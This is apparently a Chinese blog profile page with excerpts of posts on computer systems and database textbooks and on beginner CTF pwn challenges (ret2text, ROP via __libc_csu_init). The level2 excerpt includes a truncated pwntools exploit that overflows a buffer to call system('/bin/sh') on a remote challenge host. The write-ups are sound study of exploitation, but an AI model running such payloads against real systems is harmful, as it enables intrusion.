- 博客(8)
- 收藏
- 关注
RSS订阅原创 小妖学《深入理解计算机系统》
1.1 信息就是位+上下文原文计算机系统中的所有信息——包括 _磁盘文件、内存中的程序、内存中存放的用户数据以及网络上上传的数据 都是由一串比特表示的。区分不同数据的方法是我们读到这些数据对象时的上下文。简单来说计算机里边的信息无论是什么内容,都是以二进制的方式表示的,单纯的一段二进制编码采用不同的解码方式会表示不同的意思,但是每段二进制二进制编码都会有对应的上下文来确定这段二进制编码的解码方式。所以上下文和二进制编码缺一不可,即 信息=位+上下文1.2 hello.c的编译预处理阶段命令
2020-08-01 22:01:52
181
原创 小妖学《数据库系统概念》
第一章 引言数据库系统及数据库的概念数据库管理系统(DBMS)由相互关联的数据集合以及一组用于访问这些数据的程序组成。数据描述某特定的企业。DBMS的主要目的是为人们提供方便、搞笑的环境来存储和检索数据。数据库系统有一个相互关联的数据的集合和一组用以访问这些戴护具的程序组成。这个数据集合通常称为数据库。DBS主要的目的是提供一种方面、高效的存取是数据库通常称为数据库。数据库系统:DBMS...
2020-05-18 14:20:48
209
原创 攻防世界level2
我这种菜鸡就打打这种签到题刷刷存在感吧。。。32位,基本没啥保护简单溢出system函数地址和/bin/sh地址都有了直接上expfrom pwn import *p = remote('111.198.29.45',55216)bin_sh = 0x804A024system = 0x8048320payload = 'a'*0x88+'a'*4+p32(syst...
2020-03-30 23:57:32
327
原创 一步一步学 ROP 之 linux_x64 篇-level5
这道题是来自蒸米的一步一步学ROP之linux_x64篇中的level5,主要考察的是中级ROP中的__libc_csu_init。原理__libc_csu_init这个函数是用来对libc进行初始化操作的,一般的程序都会调用libc函数,所以一般都会有这个函数。.text:00000000004005C0 ; void _libc_csu_init(void).text:00000000...
2020-02-02 01:16:38
1561
原创 入门到放弃系列 ret2text2
ret2text2这道题依然是入门级别的题目,比上一道题目略难一点,主要区别在于这个题目没有直接给出的后门函数,也就是system函数参数不是/bin/sh,需要自己构造个shell。首先还是一样先看看这个程序的逻辑,发现这个程序会复述你输入的语句。然后再分别gdb和拖入ida。main函数点进function里发现逻辑没问题,也有很明显的栈溢出漏洞,其中总偏移量为0x10+8=0x18...
2019-09-11 00:55:55
607
1
原创 入门到放弃系列 ret2text
ret2text这道题目是一道入门级别的题目,主要还是熟悉堆栈原理和工具的使用,那么话不多说,开始看题。做题的第一步,先看看这道题的基本逻辑,那把程序试运行一遍发现是简单的输入输出和很常规的嘲讽战术。既然有输入输出又是pwn题应该也是肯定有溢出漏洞的(强行推断)。做题第二步,那再看看这个程序有没有什么保护措施,发现只开了一个堆栈不可执行的保护,总之就是这个程序相当不安全。同时还发现这个程序...
2019-09-10 11:53:37
1504
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人